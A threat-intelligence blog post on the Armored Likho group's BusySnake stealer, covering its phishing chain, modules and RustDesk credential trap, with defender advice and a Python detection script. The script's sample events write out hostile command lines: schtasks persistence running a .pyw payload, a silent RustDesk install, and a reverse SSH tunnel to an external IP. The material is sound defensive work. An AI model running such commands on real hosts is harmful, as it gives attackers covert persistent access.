
Etairos.ai

Posted on • Originally published at threat-intelligence.redeyesecurity.com

Armored Likho Hits Government and Power Sector with BusySnake Stealer

TL;DR

  • what: Armored Likho is running spear-phishing campaigns that deploy the previously unreported Python-based BusySnake Stealer against government agencies and the electric power sector.
  • impact: Compromised hosts leak credentials, browser cookies, Telegram sessions, crypto wallets, keystrokes, and screenshots, with reverse SSH tunnels and RustDesk giving attackers persistent hands-on access.
  • fix: Apply Microsoft's November 2025 Patch Tuesday update for CVE-2025-9491 (ZDI-CAN-25373) and block execution of RAR-delivered EXE and LNK payloads.
  • who: Government, defense, and electric power organizations in Russia, Brazil, and Kazakhstan are the confirmed targets, with UAV-sector entities historically hit by the linked Eagle Werewolf cluster.

A previously undocumented actor tracked by Kaspersky as Armored Likho is running active intrusions against government agencies and the electric power sector in Russia, Brazil, and Kazakhstan. The group mixes cyber-espionage against organizations with financially motivated theft against individuals, and its core payload is a previously unreported Python-based infostealer called BusySnake.

The attack chain starts with spear-phishing emails using lures tied to official government notices or social programs. Victims receive a RAR archive containing EXE droppers that pull additional payloads, including the stealer, from a GitHub repository. Alternate chains swap the EXE for a malicious Windows shortcut that weaponizes CVE-2025-9491 (ZDI-CAN-25373), a Windows LNK handling flaw Microsoft only patched in its November 2025 Patch Tuesday updates. Trend Micro reported last year that a dozen hacking groups have abused this same flaw since 2017.

How BusySnake operates

BusySnake runs as a background process with no console window, as its PYW file extension indicates. It decrypts its own bytecode only at the moment a function is called and re-encrypts it immediately afterward, defeating both static analysis and memory dumping. Persistence is handled through a VBScript file that registers a scheduled task; the malware checks for the task's existence and re-drops it if it is missing.

Once it establishes contact with its C2 server, the stealer waits for instructions. Built-in capabilities include clipboard theft, full filesystem enumeration logged to a local database, document upload, and screenshot capture staged and archived locally before exfiltration.

On-demand modules give operators hands-on control

The real danger is what the C2 can command on demand. Operators can trigger interval screenshots, keystroke logging, and targeted collection of high-value data:

  • Cryptocurrency wallet files with JSON extensions
  • Telegram session and credential data
  • Firefox and Chromium browser cookies and saved passwords
  • Reverse SSH tunnels established through Go2Tunnel using a private key
  • RustDesk remote desktop installation for interactive access

⚠️ The RustDesk credential trap — If RustDesk is already present on the host, BusySnake launches it and prompts the victim to enter their credentials. It then screenshots the entered credentials and exfiltrates the image to the C2. This turns a legitimate remote-support tool into a live credential-harvesting front end.

Ties to Eagle Werewolf and UAV targeting

Kaspersky links Armored Likho to a cluster BI.ZONE tracks as Eagle Werewolf, active since May 2023 and known for hitting government and defense organizations involved in UAV development. In February 2026, Eagle Werewolf compromised a drone-focused Telegram channel to distribute AquilaRAT through a Rust dropper masquerading as a Starlink activation checklist. BusySnake and AquilaRAT share task-handling logic, scheduled-task persistence, and overlapping C2 endpoints.

An evolving, likely AI-assisted toolkit

A newer BusySnake build adds a task-management framework that assigns C2 commands operational statuses such as SCHEDULED, IN_PROGRESS, SUCCEEDED, and FAILED for cleaner reporting back to operators. Kaspersky also found signs that the first-stage loaders and stagers were generated with AI assistance, citing redundant comments and duplicated code blocks. The origins of Armored Likho remain unknown.

Defender actions — Patch CVE-2025-9491 immediately if you missed the November 2025 cycle. Block RAR archives carrying EXE or LNK payloads at the mail gateway, alert on VBScript-registered scheduled tasks and PYW execution, and monitor for unexpected RustDesk installs and outbound SSH tunnels to unknown hosts.
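The four host-side detections listed above, written out as an added example (this is not Kaspersky's or RedEye's code and not from the original article). It runs rule functions over process-creation events in a Sysmon-style JSON shape; the field names (Image, CommandLine, ParentImage, ParentCommandLine), the sample events, the approved RustDesk install directory and the list of known SSH hosts are all assumptions constructed for the example and should be mapped onto your own SIEM schema and asset inventory.

```python
"""Detection rules for the BusySnake tradecraft described in the article.

Added example, not the vendor's code. Each rule takes one process-creation
event (a dict with Sysmon-like fields, an assumption) and returns True when
it should raise an alert:

  * vbscript_scheduled_task  - schtasks /create spawned by wscript/cscript
  * pyw_execution            - pythonw.exe running a .pyw script
  * unexpected_rustdesk      - a RustDesk binary outside the approved install dir
  * reverse_ssh_tunnel       - ssh.exe with -R (remote forward) to an unknown host
"""
import re

# Assumptions: where RustDesk is allowed to live, and which SSH hosts are expected.
APPROVED_RUSTDESK_DIR = "c:\\program files\\rustdesk\\"
KNOWN_SSH_HOSTS = {"jumphost.corp.example"}

# Constructed sample events (Sysmon Event ID 1 style field names are assumed).
SAMPLE_EVENTS = [
    # 1. VBScript host registering a scheduled task that runs a .pyw (persistence)
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn "Updater" /tr "C:\Users\u\AppData\Roaming\svc.pyw" /sc minute /mo 5',
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "ParentCommandLine": r"wscript.exe C:\Users\u\AppData\Roaming\init.vbs"},
    # 2. pythonw.exe executing the .pyw stealer with no console window
    {"Image": r"C:\Users\u\AppData\Local\Programs\Python\Python311\pythonw.exe",
     "CommandLine": r"pythonw.exe C:\Users\u\AppData\Roaming\svc.pyw",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "ParentCommandLine": ""},
    # 3. RustDesk installer launched from a user profile path
    {"Image": r"C:\Users\u\Downloads\rustdesk-setup.exe",
     "CommandLine": "rustdesk-setup.exe --silent-install",
     "ParentImage": r"C:\Users\u\AppData\Local\Programs\Python\Python311\pythonw.exe",
     "ParentCommandLine": ""},
    # 4. Reverse SSH tunnel (-R) to an external address with a private key
    {"Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": "ssh.exe -i key.pem -N -R 0.0.0.0:2222:127.0.0.1:3389 user@203.0.113.10",
     "ParentImage": r"C:\Users\u\AppData\Local\Programs\Python\Python311\pythonw.exe",
     "ParentCommandLine": ""},
    # 5. Benign: an admin creating a task from an elevated shell
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn "Backup" /tr "C:\Program Files\Backup\run.exe" /sc daily',
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": "cmd.exe"},
    # 6. Benign: interactive SSH session to a known jump host, no -R
    {"Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": "ssh.exe admin@jumphost.corp.example",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": "cmd.exe"},
    # 7. Benign: RustDesk from the approved install directory
    {"Image": r"C:\Program Files\RustDesk\rustdesk.exe",
     "CommandLine": "rustdesk.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": "explorer.exe"},
]


def _basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_vbscript_scheduled_task(ev):
    """schtasks /create whose parent is a VBScript host."""
    return (_basename(ev["Image"]) == "schtasks.exe"
            and "/create" in ev["CommandLine"].lower()
            and _basename(ev["ParentImage"]) in {"wscript.exe", "cscript.exe"})


def rule_pyw_execution(ev):
    """pythonw.exe (windowless interpreter) given a .pyw script."""
    return (_basename(ev["Image"]) == "pythonw.exe"
            and re.search(r"\.pyw\b", ev["CommandLine"], re.IGNORECASE) is not None)


def rule_unexpected_rustdesk(ev):
    """Any RustDesk binary that is not under the approved install directory."""
    img = ev["Image"].lower()
    return "rustdesk" in _basename(img) and not img.startswith(APPROVED_RUSTDESK_DIR)


def rule_reverse_ssh_tunnel(ev):
    """ssh.exe with a remote port forward (-R) to a host not in the known list."""
    if _basename(ev["Image"]) != "ssh.exe":
        return False
    args = ev["CommandLine"].split()
    has_remote_forward = any(a == "-R" or a.startswith("-R") for a in args)
    target = next((a for a in args if "@" in a), "")
    host = target.split("@", 1)[1] if target else ""
    return has_remote_forward and host not in KNOWN_SSH_HOSTS


RULES = {
    "vbscript_scheduled_task": rule_vbscript_scheduled_task,
    "pyw_execution": rule_pyw_execution,
    "unexpected_rustdesk": rule_unexpected_rustdesk,
    "reverse_ssh_tunnel": rule_reverse_ssh_tunnel,
}


def scan(events):
    """Return a list of (rule_name, event) pairs for every rule that fires."""
    return [(name, ev) for ev in events for name, rule in RULES.items() if rule(ev)]


def hit_names(events):
    """Sorted, de-duplicated rule names that fired over the events."""
    return sorted({name for name, _ in scan(events)})


if __name__ == "__main__":
    for name, ev in scan(SAMPLE_EVENTS):
        print(f"[{name}] {ev['Image']} :: {ev['CommandLine']}")
```

Run against the constructed events, the four malicious samples each fire exactly one rule and the three benign ones fire none. The scheduled-task rule keys on the VBScript parent rather than on schtasks alone, which is what keeps event 5 quiet, and the SSH rule keys on the -R remote forward plus an unknown destination rather than on ssh.exe itself; tune the approved directory and host list before deploying.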

For critical infrastructure operators, the combination of espionage tooling and hands-on remote access is the concern here. This is not smash-and-grab. Armored Likho is built to sit quietly, decrypt only when needed, and pull tailored modules against whatever it finds on a power-sector or government host.


Originally published on RedEye Threat Intelligence.
